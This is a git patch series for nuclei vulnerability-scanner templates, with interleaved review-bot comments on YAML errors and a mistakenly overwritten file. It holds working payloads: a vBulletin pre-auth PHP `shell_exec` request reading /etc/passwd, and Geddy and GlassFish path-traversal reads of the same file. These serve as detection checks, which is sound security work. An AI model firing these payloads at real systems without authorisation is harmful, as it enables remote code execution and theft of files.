From 0f765c8824928a09714489c2929ce1818165ae7c Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 25 Feb 2021 01:30:52 +0530
Subject: [PATCH 01/20] Create CVE-2020-17496.yaml
---
 cves/2020/CVE-2020-17496.yaml | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 cves/2020/CVE-2020-17496.yaml
diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml
new file mode 100644
index 0000000000..7fecc0fdfa
--- /dev/null
+++ b/cves/2020/CVE-2020-17496.yaml
@@ -0,0 +1,20 @@
+id: CVE-2020-17496
+info:
+ name: vBulletin Pre-Auth RCE
+ author: pussycat0x, kettelabs
+ severity: high
+ reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
+ tags: cve,cve2020,vbulletin
+requests:
+ -method: POST
+ path:
+ -"{{BaseURL}}ajax/render/widget_tabbedcontainer_tab_panel"
+ body:subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;
+ matchers-condition: and
+ matchers:
+ -type: regex
+ regex:
+ -"root:[x*]:0:0"
+ -type: status
+ status:
+ -200
From ae38390e09b323786ecfd14b88605a90c82f34c3 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 25 Feb 2021 01:48:54 +0530
Subject: [PATCH 02/20] Update CVE-2020-17496.yaml
---
 cves/2020/CVE-2020-17496.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml
index 7fecc0fdfa..32ffe74967 100644
--- a/cves/2020/CVE-2020-17496.yaml
+++ b/cves/2020/CVE-2020-17496.yaml
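Review bot: The list entries in the new cves/2020/CVE-2020-17496.yaml ([PATCH 01/20]) are written `-method: POST`, `-type: regex` and `-200` with no space after the dash, and `body:subWidgets[0]…` has no space after the colon, so YAML will not read them as list items or a key/value pair and the template cannot load as intended. Write `- method: POST`, `- type: regex`, `- 200`, and put the body after `body: ` as a quoted scalar. The path `{{BaseURL}}ajax/render/…` is also missing the `/` after `{{BaseURL}}`. The same `-200` is still present on the new side of PATCH 09, 10 and 15. Indentation is collapsed in this view, so the nesting itself could not be checked.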
@@ -8,7 +8,7 @@ info: requests: -method: POST path: - -"{{BaseURL}}ajax/render/widget_tabbedcontainer_tab_panel" + -"{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" body:subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; matchers-condition: and matchers: From f91b3ad0c2b9c554f025517c04173a82248b5b68 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 02:11:02 +0530 Subject: [PATCH 03/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 32ffe74967..44d22bab63 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -17,4 +17,4 @@ requests: -"root:[x*]:0:0" -type: status status: - -200 + -200 From 3f5cf52a1cd205d255b6ba6e98b16c66f9c39631 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 02:12:51 +0530 Subject: [PATCH 04/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 44d22bab63..ede3c59e15 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -1,7 +1,7 @@ id: CVE-2020-17496 info: name: vBulletin Pre-Auth RCE - author: pussycat0x, kettelabs + author: pussycat0x,kettelabs severity: high reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed tags: cve,cve2020,vbulletin 
@@ -9,7 +9,7 @@ requests: -method: POST path: -"{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" - body:subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; + body:subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; matchers-condition: and matchers: -type: regex From 40f751fa4d71cdd3a55d738e1ccfda57cd1fded6 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 02:18:48 +0530 Subject: [PATCH 05/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index ede3c59e15..c0480e234b 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -9,7 +9,8 @@ requests: -method: POST path: -"{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" - body:subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; + body: | + subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; matchers-condition: and matchers: -type: regex From 73c5f9e8cd271853a548ef7bd5e068c4b76eae84 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 02:24:26 +0530 Subject: [PATCH 06/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index c0480e234b..7893678a57 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml 
@@ -6,11 +6,13 @@ info: reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed tags: cve,cve2020,vbulletin requests: - -method: POST - path: - -"{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" - body: | - subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; + - raw: + - | + POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Host: {{Hostname}} + + subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; + matchers-condition: and matchers: -type: regex From c0922ec5d15afaf978a1a5a1c4bc56972b6bfa6a Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 25 Feb 2021 02:34:40 +0000 Subject: [PATCH 07/20] Create CVE-2015-5688.yaml --- cves/2015/CVE-2015-5688.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2015/CVE-2015-5688.yaml diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml new file mode 100644 index 0000000000..ab95c85cac --- /dev/null +++ b/cves/2015/CVE-2015-5688.yaml @@ -0,0 +1,24 @@ +id: CVE-2015-5688 + +info: + name: Geddy before v13.0.8 LFI + author: pikpikcu + severity: high + issues: https://github.com/geddy/geddy/issues/697 + reference: https://nvd.nist.gov/vuln/detail/CVE-2015-5688 + tags: geddy,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + part: body + + - type: status + status: + - 200 From c9cf6b3198134cb282816829cae361a79508ae37 Mon Sep 17 00:00:00 2001 
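Review bot: The raw request added in [PATCH 06/20] sends a form-encoded POST body but carries only a `Host` header; without `Content-Type: application/x-www-form-urlencoded` the server is unlikely to parse `subWidgets[...]` as form fields, so an affected host can be reported as clean. Add that header line directly under `Host: {{Hostname}}`. As far as the hunks show, the `method`/`body` form used in PATCH 01, 09, 10 and 15 has the same gap, since no `headers:` block is set there. The matcher entries kept as context here (`-type: regex`) still lack the space after the dash.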
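Review bot: The path in the new cves/2015/CVE-2015-5688.yaml ([PATCH 07/20]) appends a fixed port to the target, `{{BaseURL}}:4000/..%2f…`, although `{{BaseURL}}` already carries whatever scheme, host and port the operator supplied; a target given with an explicit port or a path then produces a malformed URL and the check misses it without any error. Use `{{BaseURL}}/..%2f…` and, if the service is normally reached on port 4000 (the hard-coded value suggests so, not confirmed here), say that in a `description:` line so operators pass the port in the target. The `tags:` line also omits `cve,cve2015`, which the other CVE templates in this series carry.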
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 25 Feb 2021 02:35:55 +0000 Subject: [PATCH 08/20] update tags --- cves/2015/CVE-2015-5688.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml index ab95c85cac..3e20097031 100644 --- a/cves/2015/CVE-2015-5688.yaml +++ b/cves/2015/CVE-2015-5688.yaml @@ -6,7 +6,7 @@ info: severity: high issues: https://github.com/geddy/geddy/issues/697 reference: https://nvd.nist.gov/vuln/detail/CVE-2015-5688 - tags: geddy,lfi + tags: cve,cve2015,geddy,lfi requests: - method: GET From 7b45997a1c21d0482b8d0ebd2f2bc3889dccccf7 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 12:04:10 +0530 Subject: [PATCH 09/20] Update CVE-2017-1000028.yaml --- cves/2017/CVE-2017-1000028.yaml | 38 ++++++++++++++++----------------- 1 file changed, 18 insertions(+), 20 deletions(-) diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml index cc906fc2b6..a879ee5732 100644 --- a/cves/2017/CVE-2017-1000028.yaml +++ b/cves/2017/CVE-2017-1000028.yaml 
@@ -1,23 +1,21 @@ -id: CVE-2017-1000028 - +id: CVE-2020-17496 info: - name: GlassFish LFI - author: pikpikcu - severity: high - reference: https://www.exploit-db.com/exploits/45196 - tags: cve,cve2017,oracle,glassfish,lfi - + name: vBulletin Pre-Auth RCE + author: pussycat0x + severity: high + reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed + tags: cve,cve2020,vbulletin requests: - - method: GET - path: - - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - matchers-condition: and - matchers: - - type: word - words: - - "/sbin/nologin" - part: body - + - method: POST + path: + - "{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" + body: "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" + +matchers-condition: and +matchers: + - type: regex + regex: + - "root:[x*]:0:0" - type: status - status: - - 200 +status: + -200 From 247245c8375ac21bb595c1be3c1a7022e0e14570 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 12:25:34 +0530 Subject: [PATCH 10/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 30 ++++++++++++++---------------- 1 file changed, 14 insertions(+), 16 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 7893678a57..37585aa104 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml 
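Review bot: [PATCH 09/20] overwrites cves/2017/CVE-2017-1000028.yaml with the vBulletin check: the new side has `id: CVE-2020-17496` in a file named for CVE-2017-1000028, so the GlassFish detection is removed and the repository ends up with two templates sharing one id. This looks like an edit made in the wrong file and should be dropped from this path. In the new text `matchers-condition:`, `matchers:` and `status:` also start at column 0, outside the `requests` entry, and `-200` has no space after the dash, so even as a vBulletin check the matchers would not be applied as intended.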
@@ -1,23 +1,21 @@ id: CVE-2020-17496 info: name: vBulletin Pre-Auth RCE - author: pussycat0x,kettelabs + author: pussycat0x severity: high reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed tags: cve,cve2020,vbulletin requests: - - raw: - - | - POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 - Host: {{Hostname}} - - subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; - - matchers-condition: and - matchers: - -type: regex - regex: - -"root:[x*]:0:0" - -type: status - status: - -200 + - method: POST + path: + - "{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" + body: "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + -200 From 02fffe3c635467d418f6df3524dc784887a9cc49 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 14:06:06 +0530 Subject: [PATCH 11/20] Update CVE-2015-5688.yaml --- cves/2015/CVE-2015-5688.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml index 3e20097031..0835a41425 100644 --- a/cves/2015/CVE-2015-5688.yaml +++ b/cves/2015/CVE-2015-5688.yaml @@ -11,7 +11,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + matchers-condition: and matchers: - type: regex From 88fcfacecdb6e76882583f12da4d419c4f5a5391 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Thu, 25 Feb 2021 08:37:20 +0000 Subject: [PATCH 12/20] Auto Update README [Thu Feb 25 08:37:20 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f35e301e7c..ab79b71125 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 204 | vulnerabilities | 96 | exposed-panels | 74 | +| cves | 205 | vulnerabilities | 96 | exposed-panels | 74 | | exposures | 55 | technologies | 46 | misconfiguration | 48 | | workflows | 21 | miscellaneous | 12 | default-logins | 10 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**61 directories, 597 files**. +**61 directories, 598 files**. From f3d73944a33b6a8b5b3063ad3253f4cfa5dc47ea Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 14:24:57 +0530 Subject: [PATCH 13/20] Added phpmyadmin-setup --- miscellaneous/phpmyadmin-setup.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 miscellaneous/phpmyadmin-setup.yaml diff --git a/miscellaneous/phpmyadmin-setup.yaml b/miscellaneous/phpmyadmin-setup.yaml new file mode 100644 index 0000000000..68d64e30f0 --- /dev/null +++ b/miscellaneous/phpmyadmin-setup.yaml 
@@ -0,0 +1,29 @@ +id: phpmyadmin-setup + +info: + name: Publicly Accessible Phpmyadmin Setup + author: sheikhrishad + severity: medium + + +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/_phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/php/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/web/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" + + matchers-condition: and + matchers: + - type: word + words: + - "You want to configure phpMyAdmin using web interface" + + - type: status + status: + - 200 \ No newline at end of file From d623e95e2f174589de3e4ed449e3fc4200983685 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Feb 2021 08:55:29 +0000 Subject: [PATCH 14/20] Auto Update README [Thu Feb 25 08:55:29 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ab79b71125..e396143a21 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 205 | vulnerabilities | 96 | exposed-panels | 74 | | exposures | 55 | technologies | 46 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 12 | default-logins | 10 | +| workflows | 21 | miscellaneous | 13 | default-logins | 10 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**61 directories, 598 files**. +**61 directories, 599 files**. From fc11a30eb7c1c6e2eda519608afd78bfcaca1ef4 Mon Sep 17 00:00:00 2001 
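Review bot: The `info` block of the new miscellaneous/phpmyadmin-setup.yaml ([PATCH 13/20]) has no `tags:`, `reference:` or `description:`, unlike the CVE templates in this series, so tag-filtered scans will not select it and a finding gives the responder no indication of why a reachable `scripts/setup.php` needs action. Add at least `tags: phpmyadmin` and a one-line `description:` stating that the setup page answered without authentication and should be removed or access-restricted. The file also contains a doubled blank line after `severity: medium` and ends without a trailing newline.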
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 14:34:22 +0530 Subject: [PATCH 15/20] misc changes --- cves/2020/CVE-2020-17496.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 37585aa104..a9e48e2b1e 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -1,16 +1,18 @@ id: CVE-2020-17496 info: name: vBulletin Pre-Auth RCE - author: pussycat0x - severity: high + author: pussycat0x + severity: critical reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed - tags: cve,cve2020,vbulletin + tags: cve,cve2020,vbulletin,rce + requests: - method: POST path: - "{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" - body: "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" - + + body: "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" + matchers-condition: and matchers: - type: regex @@ -18,4 +20,4 @@ requests: - "root:[x*]:0:0" - type: status status: - -200 + -200 From 275ca9dbba8f5f942b72891fd4734eded6e24ea7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 14:37:22 +0530 Subject: [PATCH 16/20] updating overwrite --- cves/2017/CVE-2017-1000028.yaml | 38 +++++++++++++++++---------------- 1 file changed, 20 insertions(+), 18 deletions(-) diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml index a879ee5732..dd2b8b5604 100644 --- a/cves/2017/CVE-2017-1000028.yaml +++ b/cves/2017/CVE-2017-1000028.yaml 
@@ -1,21 +1,23 @@ -id: CVE-2020-17496 +id: CVE-2017-1000028 + info: - name: vBulletin Pre-Auth RCE - author: pussycat0x - severity: high - reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed - tags: cve,cve2020,vbulletin + name: GlassFish LFI + author: pikpikcu + severity: high + reference: https://www.exploit-db.com/exploits/45196 + tags: cve,cve2017,oracle,glassfish,lfi + requests: - - method: POST - path: - - "{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" - body: "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" - -matchers-condition: and -matchers: - - type: regex - regex: - - "root:[x*]:0:0" + - method: GET + path: + - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + matchers-condition: and + matchers: + - type: word + words: + - "/sbin/nologin" + part: body + - type: status -status: - -200 + status: + - 200 \ No newline at end of file From 3d0b0f996e913539b9cf00051d286fc25b54803a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 14:40:01 +0530 Subject: [PATCH 17/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index a9e48e2b1e..091c725823 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -17,7 +17,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:[x*]:0:0" - type: status status: - -200 + - 200 From 99e7f93500134c105b7c69d355478ee29e702078 Mon Sep 17 00:00:00 2001 
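Review bot: The GlassFish matcher restored in [PATCH 16/20] keys on the single word `/sbin/nologin`, which is a weaker signal than the `root:[x*]:0:0` regex used by the other /etc/passwd checks in this series: any 200 response that merely mentions that path string is reported as a file disclosure. For consistency and fewer false positives, consider `- type: regex` with `- "root:[x*]:0:0"` and keep `part: body`. The file also ends without a trailing newline.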
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 14:43:06 +0530 Subject: [PATCH 18/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 091c725823..60a263b098 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -15,9 +15,10 @@ requests: matchers-condition: and matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 \ No newline at end of file From 707a4de8650ab9fb65a8401f1291fc61b589b351 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 15:01:40 +0530 Subject: [PATCH 19/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 60a263b098..e5eab40390 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -7,11 +7,12 @@ info: tags: cve,cve2020,vbulletin,rce requests: - - method: POST - path: - - "{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" + - raw: + - | + POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Content-Type: application/x-www-form-urlencoded - body: "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" + subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" matchers-condition: and matchers: From c9a23276ea8139a4be7b806e51e9bffc8a138f25 Mon Sep 17 00:00:00 2001 
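Review bot: The last body line added in [PATCH 19/20] ends with a stray double quote, `… exit;"`, left over from the quoted `body:` scalar it replaces; inside the `|` block that quote is sent as part of the `code` value, so the request differs from what earlier revisions sent and the matcher may never fire on an affected host. Drop the trailing `"`. The raw request also has no `Host: {{Hostname}}` line, which the raw version in PATCH 06 had; restore it unless the engine is known to add it.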
From: GitHub Action Date: Thu, 25 Feb 2021 09:33:07 +0000 Subject: [PATCH 20/20] Auto Update README [Thu Feb 25 09:33:07 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e396143a21..b98fc89840 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 205 | vulnerabilities | 96 | exposed-panels | 74 | +| cves | 206 | vulnerabilities | 96 | exposed-panels | 74 | | exposures | 55 | technologies | 46 | misconfiguration | 48 | | workflows | 21 | miscellaneous | 13 | default-logins | 10 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**61 directories, 599 files**. +**61 directories, 600 files**.